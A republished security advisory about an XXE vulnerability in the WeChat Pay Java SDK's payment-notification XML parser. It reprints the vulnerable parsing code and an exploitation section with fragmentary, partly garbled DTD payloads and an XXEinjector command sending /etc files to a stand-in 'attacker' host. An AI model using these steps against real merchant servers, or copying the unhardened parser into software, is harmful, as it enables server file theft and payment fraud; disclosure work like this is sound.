2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
XXE vulnerability exists in WeChat Pay SDK
Source of vulnerability information:
http://seclists.org/fulldisclosure/2018/Jul/3
https://xz.aliyun.com/t/2426
0x00 Affected version:
Java SDK, WxPayAPI_JAVA_v3. Companies that use this version are advised to check for abnormal payments.
The Java version of the WeChat Pay SDK provides a notify callback function that lets merchants receive asynchronous payment results. This API accepts data in XML format, so an attacker can construct malicious callback data (in XML format) to read any information on the merchant server. Once the attacker has obtained the payment security key (the md5-key) and the merchant information, any item can be paid for directly at 0 yuan.
0x01 Vulnerability details
The SDK is published on this page: https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=11_1
Java version only: https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip or https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o6ud/view (backup)
The README.md in WxPayApi_JAVA_v3.zip shows more details. Notify code example:
```java
String notifyData = "...."; // the payment result notification received from WeChat Pay
MyConfig config = new MyConfig();
WXPay wxpay = new WXPay(config);
// convert to map
Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);
if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {
    // do business logic
} else {
    // signature invalid
}
```
WXPayUtil source code (the DocumentBuilderFactory is used with its default settings, so external entities are resolved while the XML is parsed):
```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.util.HashMap;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

// excerpt from WXPayUtil
public static Map<String, String> xmlToMap(String strXML) throws Exception {
    try {
        Map<String, String> data = new HashMap<String, String>();
        /* not disabled xxe */
        // start parse
        DocumentBuilderFactory documentBuilderFactory = DocumentBuilderFactory.newInstance();
        DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();
        InputStream stream = new ByteArrayInputStream(strXML.getBytes("UTF-8"));
        org.w3c.dom.Document doc = documentBuilder.parse(stream);
        // end parse
        doc.getDocumentElement().normalize();
        NodeList nodeList = doc.getDocumentElement().getChildNodes();
        for (int idx = 0; idx < nodeList.getLength(); ++idx) {
            Node node = nodeList.item(idx);
            if (node.getNodeType() == Node.ELEMENT_NODE) {
                org.w3c.dom.Element element = (org.w3c.dom.Element) node;
                data.put(element.getNodeName(), element.getTextContent());
            }
        }
        try {
            stream.close();
        } catch (Exception ex) {
            // do nothing
        }
        return data;
    } catch (Exception ex) {
        WXPayUtil.getLogger().warn("Invalid XML, can not convert to map. Error message: {}. XML content: {}", ex.getMessage(), strXML);
        throw ex;
    }
}
```
0x02 Exploitation details
Find the merchant's notify URL and POST the payload to it:
%xxe;]>
Data.dtd:
%shell;%upload;
Or use the XXEinjector tool (https://github.com/enjoiz/XXEinjector):
ruby XXEinjector.rb --host=attacker --path=/etc --file=req.txt --ssl
req.txt:
POST merchant_notification_url HTTP/1.1
Host: merchant_notification_url_host
User-Agent: curl/7.43.0
Accept: */*
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

XXEINJECT